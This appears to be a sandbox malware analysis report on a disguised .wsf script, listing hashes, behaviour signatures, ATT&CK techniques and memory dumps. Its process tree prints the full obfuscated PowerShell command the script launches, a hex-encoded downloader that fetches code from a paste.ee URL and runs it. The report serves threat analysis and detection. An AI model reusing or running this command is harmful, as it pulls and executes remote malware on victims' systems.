4906ba33082206f0c7bdfb19b30c3321f37318a9da7463d773250ab04f8ec18e

Analysis

max time kernel
119s
max time network
123s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
25/09/2024, 01:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

New_Document-660104278752.wsf
Size

3KB
MD5

a59f3f8c3324fb52917cb2b6d0ff99e6
SHA1

6ede16125c59622aa7ea57566ab0c1ffe10ffb45
SHA256

244fd650898fb0f5cf43c7255bf56933c56061604a00e8ce834f8954e6f2736a
SHA512

de9175c1285be232de8e26798b98787fbbcb2576a331f424e60ddd036fab5d10c1b991760c6d7edfcd2553164865b327eecd13bc9bc99894bd904dad79177f8b

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
5	2508	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2508	powershell.exe
2820	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2508	powershell.exe
Token: SeDebugPrivilege	2820	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2168 wrote to memory of 2508	2168	WScript.exe	30
PID 2168 wrote to memory of 2508	2168	WScript.exe	30
PID 2168 wrote to memory of 2508	2168	WScript.exe	30
PID 2508 wrote to memory of 2820	2508	powershell.exe	32
PID 2508 wrote to memory of 2820	2508	powershell.exe	32
PID 2508 wrote to memory of 2820	2508	powershell.exe	32

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\New_Document-660104278752.wsf"
1⤵
- Suspicious use of WriteProcessMemory
PID:2168
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$ReDrO = [STRINg]::jOIn('' , ( ( 24,52 ,'3d', 27, 49 , 65, 58 ,28, '4e' ,65 ,27,'3b', 24 , 52,45 , 20, '3d' ,20, 24 ,52,'2b' ,27 ,57, '2d' ,'4f' , 42 ,'4a',27 ,'3b',24 , 52, 45 ,44 ,20 ,'3d' ,20,24 ,52, 45,'2b',27 ,65,43, 54 , 20 , '4e' , 65 ,54 ,'2e' , 57,27,'3b',24, 50,41,43 , '3d' ,27 , 65 , 42 , 43 , '4c',27,'3b' , 24 , 78 ,78 ,20,'3d',20 ,24,50 ,41 ,43,'2b' , 27 ,49 , 65, '4e' , 27 , '3b',24, 52, '4f' , 20,'3d' , 20 ,24, 78, 78 ,'2b' ,27,54 , 29 ,'2e', 44, '4f' , 57, '4e','4c','4f',27, '3b' ,24,'7a', '7a', '3d' ,27 ,'4f' ,40,30, 28 , 26, 28 ,27 , 27,68 , 74 ,74 ,70 ,73, '3a','2f' , '2f',70,61,73,74 ,65, '2e' ,65 ,65,'2f',72, '2f',79, 45, 55 , '4d',51,'2f' , 30,27,27 ,29 ,27 , '2e', 52,65,50 , '4c' ,41 , 43, 65, 28 ,27,'4f', 40 , 30, 28, 26 , 27,'2c' ,27 , 41, 44,53 , 54 ,52, 49 ,'4e' ,47,27,29 ,'3b' , 69,65,78,28, 24 ,52 ,45 , 44, '2b' , 24 ,52 , '4f','2b', 24,'7a' ,'7a',29 ) |foREAcH-Object{( [CONVeRT]::ToiNt16(([sTrING]$_ ),16) -AS[CHaR])})) |& ( $ShEllid[1]+$SheLLID[13]+'x') ; powershell $ReDrO"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2508
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2820

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
0b7f29ecc23db2eca12db63c676dfb79

SHA1
ac8efe36f03cfef6e43bd4788d5c4079adadd6f3

SHA256
7b43529390b39c917a107491f7b3d308b2ff0e994dc44a4224eba611436c2923

SHA512
99bce099c1700ac7ef7de20586176d55cfd19e905beedc6d5d474125e51e818c2b506fc445248cafc9e922ca8851df94d509c01c63143d218e334c8332c94c64

Download Submit
memory/2508-4-0x000007FEF558E000-0x000007FEF558F000-memory.dmp

Filesize
4KB

Download
memory/2508-5-0x000000001B710000-0x000000001B9F2000-memory.dmp

Filesize
2.9MB

Download
memory/2508-6-0x0000000002790000-0x0000000002798000-memory.dmp

Filesize
32KB

Download
memory/2508-7-0x000007FEF52D0000-0x000007FEF5C6D000-memory.dmp

Filesize
9.6MB

Download
memory/2508-8-0x000007FEF52D0000-0x000007FEF5C6D000-memory.dmp

Filesize
9.6MB

Download
memory/2508-9-0x000007FEF52D0000-0x000007FEF5C6D000-memory.dmp

Filesize
9.6MB

Download
memory/2508-10-0x000007FEF52D0000-0x000007FEF5C6D000-memory.dmp

Filesize
9.6MB

Download
memory/2508-11-0x000007FEF52D0000-0x000007FEF5C6D000-memory.dmp

Filesize
9.6MB

Download
memory/2508-20-0x000007FEF52D0000-0x000007FEF5C6D000-memory.dmp

Filesize
9.6MB

Download
memory/2508-22-0x000007FEF52D0000-0x000007FEF5C6D000-memory.dmp

Filesize
9.6MB

Download
memory/2508-21-0x000007FEF558E000-0x000007FEF558F000-memory.dmp

Filesize
4KB

Download